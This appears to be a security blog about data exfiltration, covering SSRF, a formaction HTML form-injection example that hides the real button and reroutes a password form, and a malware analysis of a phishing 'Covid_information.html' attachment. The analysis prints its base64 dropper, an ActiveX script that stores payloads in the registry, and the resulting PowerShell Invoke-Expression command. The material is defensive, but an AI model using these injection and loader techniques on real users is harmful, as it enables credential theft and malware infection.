Data exfiltration is the unauthorized transfer of sensitive information from a target’s network to a location which a threat actor controls”[02].   For the National Security and Organizations the worst scenario is when the attackers not only steal data (cyber-espionage) but also modify them producing cyber-sabotage.

The leakage of sensitive information from a protected network to an external network could result in serious damage to the organizations in terms of reputation, loss of revenue and legal consequences, for example:

  • National Security: the steal of classified documents may endanger national security;
  • Organizations: proprietary information can be sold to a rival company causing a loss of competitive advantage;
  • Citizens: the spreading of personal sensitive data could have serious privacy and security implications like Identity Theft by an ATO attack.

Sensitive proprietary digital information could be contained in:

  • static content: files, images, texts, spreadsheets, phone-books, agenda etc.;
  • dynamic content: multimedia sessions, telephone conversations, video conferences, chatting channels (text, video image).

The leakage can be done in several ways:

- the data are ex-filtrated without altering the original files;
- the data are modified: converted in new file format or encrypted;
- the data are hidden using steganography techniques;
- the data are ex-filtrated using a combination of the aforementioned techniques.



SSRF ( Server-Side Request Forgery) is  an external attack which lets an attacker send crafted requests from the back-end server of a vulnerable web application. SSRF is commonly used by attackers to target internal networks that are behind firewalls and can not be reached from the external network.


This image has an empty alt attribute; its file name is SSRF.png


SSRF - Server Side Request Forgery Schema


It is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. Furthermore it could:

✔ potentially leaking sensitive data such as authorization credentials;
✔ might even allow an attacker to perform arbitrary command execution.



An attacker can export users’ sensitive data using “HTML form injection attack”. Here is an example of using the formaction attribute. According to the HTML 5 specification, it can be used to overwrite the action attribute of its parent form by specifying the URL of the file that will process the input control when the from is submitted.

Le us consider the following normal form in a HTML page:

<form action=”URL” ... >

list of couples (label, data-box)

<button type=”submit”... /> label </button>


We inject a formaction attribute:

<form action=”URL” ... >

list of couples (label, data-box)

<button type="submit" formaction="BAD URL "> Fake Search! </button>


The injected form sends its form-data to BAD URL instead of URL.



In this type of attack we use the formaction attribute which is fully supported by all browsers. It specifies where to send the form-data when a form is submitted by overriding the form's  action attribute. The following HTML code:

<h1>AUTHENTICATION System</h1> 

<div align="left">

<form action="/action.php" method="get">

<label for="nPSW">My Password:</label>
<input type="text" id="iPSW" name="nPSW"><br><br>

<button type="submit">Submit Password</button>

<button type="submit" formaction="/form_action.php">Submit Password to another page</button>



This image has an empty alt attribute; its file name is formaction.png


by clicking on Submit Password we have:


by clicking on Submit Password to another page we have:


The following HTML:


<form name="fsbycode" class="s4form" action="" method="post">

<h2>Search Guest By Numeric Code</h2>

Codice Numerico: <input type="number" autocomplete="on" id="icode" name="icode" autofocus placeholder="Insert Code Number" >

<input class="SButton" type="submit" value="Search!">



Produce this form in the web browser:


Normal Web Form

The attack on the web server can produce the following  abused HTML:

<form name="fsbycode" class="s4form" action="" method="post">

<h2>Search Guest By Numeric Code</h2>

Codice Numerico: <input type="number" autocomplete="on" id="icode" name="icode"
autofocus placeholder="Insert Code Number" >

<!-- BEGIN attacker's code -->
      <button type="submit" formaction=""> Fake Search! </button>
      <style> .SButton {visibility:hidden;} </style>
<!-- END attacker's code -->

<input class="SButton" type="submit" value="Search!">


As we can see in the above code, the correct button used for the submission of the form is hidden by using the style applied to the class .SButton <style> .SButton {visibility:hidden;} </style>.

The previous HTML shows in the browser:

Abused Web Form
By clicking on Fake Search! button the next HTTP request is produced:

Proxy-Connection: keep-alive
Content-Length: 16
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: null
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip,deflate,sdch
Accept-Language: it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4,he;q=0.2


This show how the data are sent to the illegitimate web site "" instead of (the web site are only used for demonstration purposes of how the attack scheme works).



It is done by a trusted individual with legitimate access to its network and system resources.  Compared to external threats, insider threats are more dangerous and difficult to detect and prevent.  

if the insider individual uses the protected network to exfiltrate sensitive information, he could use several type of communication channel:

  • overt communication: preserving privacy by using encryption;
  • tunnelled communication: over authorized overt channel;
  • covert communication: using steganography techniques to cloak the content.




In order to face this serious problem the security system of a ICT infrastructure must be equipped with mechanisms for prevention, detection, damage limitation and monitoring.

In order to lower the risk of attacks, unauthorized communication channels should be blocked to prevent the exfiltration of data externally to the organization through compromised applications.

We need a system to detect when a web site is compromised to promptly react to the attack.
The use of Sensitive Information Dissemination Detection (SIDD) systems is a mechanism for stopping leakage of sensitive information on time. It monitors the outbound traffic from the protected network, taking actions responsively in case of suspect traffic of packets.

When the attack is in progress we have to limit the damages by closing any compromised channels.
After attack detection this is what must be done in order to minimize information leakage:

1) analyze what vulnerability has been exploited and if it is structural of the system or not;
2) harden the security of the information system to avoid another attack of the same type.

If the security system doesn't detect any problems, it is highly recommended to run a random deep security check because an information leakage could have been happened in a stealthy mode.



  1. Eric Y. Chen, Sergey Gorbaty, Astha Singhal and Collin Jackson: Self-Exfiltration: The Dangers of Browser-Enforced Information Flow Control, Carnegie Mellon University;
  3. Yali Liu, Cherita Corbett and Ken Chiang, Rennie Archibald, Biswanath Mukherjee and Dipak Ghosal, SIDD: A Framework for Detecting Sensitive Data Exfiltration by Insider Attack, University of California, Usa;
  4. Server-Side Request Forgery (SSRF);

Last update on 19/03/2022

Everyone knows by now that you have to be very careful when surfing the internet. A little carelessness can cost you a lot and can lead to the loss of data and information, which are the most precious intangible asset today. As 72% of attacks coming into organizations were reported to be attacks through email, in this post I warn again about HTML files that can be received by email as attachments. They seem harmless but looking at them closely they hide a thousand pitfalls and dangers.

At Application Level any device interact with the cyberspace mainly using mail client and web browser.

As a demonstration of the above I’m going to examine as much as possible an HTML file received as an attachment. It’s named “Covid_information.html”.

Parallel use of many attack techniques: Spear Phishing, Malicious code in an HTML file and Web browser vulnerabilities

The JavaScript code inside “Covid_information.html” is the following one.


  text=”a base-64 encoded long string of 1622 KB”

  function download(data, filename, type) {
    var file = new Blob([data], {type: type});
    if (window.navigator.msSaveOrOpenBlob) 
        window.navigator.msSaveOrOpenBlob(file, filename);
    else { 
        var a = document.createElement("a"),
                url = URL.createObjectURL(file);
        a.href = url; = filename;
        setTimeout(function() {
        }, 0); 
bt = atob(text);
bN = new Array(bt.length);
for(var i =0;i < bt.length; i++){
   bN[i] = bt.charCodeAt(i);
bA = new Uint8Array(bN);


The first statement is an assignment to the variable “text” of a base-64 encoded 1622 KB string. Practically this is the malicious payload to which we will give a look afterwards.

After the function “download”:

  1. creates a hyperlink on-fly;
  2. link to it a file created using the content of data variable;
  3. download this file. 

The following statement decode the base-64 content of “text” using the atob() function.

The any char is transcoded to Unicode using charCodeAt() function. At the end the file named "Covid.iso" is downloaded to the local storage.

An outlook to Covid.iso file.

The file Covid.iso encapsulated an HTML file with the following JavaScript code:

    <script language="javascript">
    var a = new ActiveXObject('Wscript.Shell');
    function start() {
        res = document.getElementById("p1").innerHTML;
        a.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\JavaSoft\\Ver", res, "REG_SZ");
        res = document.getElementById("p2").innerHTML;
        a.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\JavaSoft\\Ver2", res, "REG_SZ");
        res = document.getElementById("c1").innerHTML;
        res += document.getElementById("c2").innerHTML;
        res += document.getElementById("c3").innerHTML;
        res += document.getElementById("c4").innerHTML;

        res += document.getElementById("c5").innerHTML;
        a.Run(res, 0);

In this code what is crucial is the content of DOM elements which are on board of HTML file, that is: p1,p2,c1,c2,c3,c4 and c5.

These elements are used for a kind of obfuscation; because they are then assembled together in order to execute any sort of code in the host machine.

P1= (“a base-64 encoded long string”) containing a binary.

P2= (“a base-64 encoded long string”) containing code:


c2=hell -C Invo

c3=ke-Expression (g

c4=p HKCU:\\SO


the final command is:

powershell -C Invoke-Expression (gp HKCU:\\SOFTWARE\\JavaSoft).Ver

Invoke-Expression cmdlet is used to perform a command or expression on local computer.

Even if the above analysis is not complete, it demonstrates a high level of sophistication resulting from guys with a high level of know-how.

So beware of attachments in HTML format!


Email attachments are one of the main vector of malicious code. According to analysis by Helsinki-based security provider F-Secure 85% of all malicious emails have a .DOC, .XLS, .PDF, .ZIP, or .7Z attached.

But now, in addition to them, we have to consider another type of dangerous attachment .HTML.

When we receive an email with an attachment of .HTML type, we have to be very careful and don’t’ open it. The .HTML file could contain, for example, these dangerous JavaScript code:

<body onpageshow="document.location.replace(window.atob('a base-64 encoded string'));">


<frameset onpageshow="document.location.replace(window.atob('a base-64 encoded string'));"> 

It is used onpageshow event because it occurs every time the page is loaded, while the onload event occurs only when the page first loads and it does not occur when the page is loaded from the cache.

document.location.replace(newURL) replaces the current document with a new one.

The atob() method decodes a base-64 encoded string encoded by the btoa() method. The base-64 code string obfuscates the URL it represents.

In the second code snippet we can notice the use of <frameset> tag which is deprecated, no longer recommended and not supported in HTML5. Anyway some browsers might still support it for compatibility purposes.

The problem is that the JavaScript code inside the HTML page can load any URL page, and only decoding the “base-64 encoded string” you can know which web page. The decoding of base-64 string is done dynamically by atob function when the web page is showed in the web browser. So, if you open the file, it is already too late in case of malicious web page.

With malicious code in a web page we can have:

  • Malicious Ads: they are advertisements on the Web that infect the user's machine with malware in order to make the compromised machine a member of a Botnet.
  • A Malware Distribution Network (MDN): it is a collection of landing pages, malware repository servers, and standard redirection pages. The goal of an MDN is to redirect the victim from a landing page to a malware repository server.
  • Drive by Downloads: it refers to the automatic download of software to a user's device, without the user's knowledge or consent.

Here it is how an antivirus reacted when it scans this type of HTML attachment: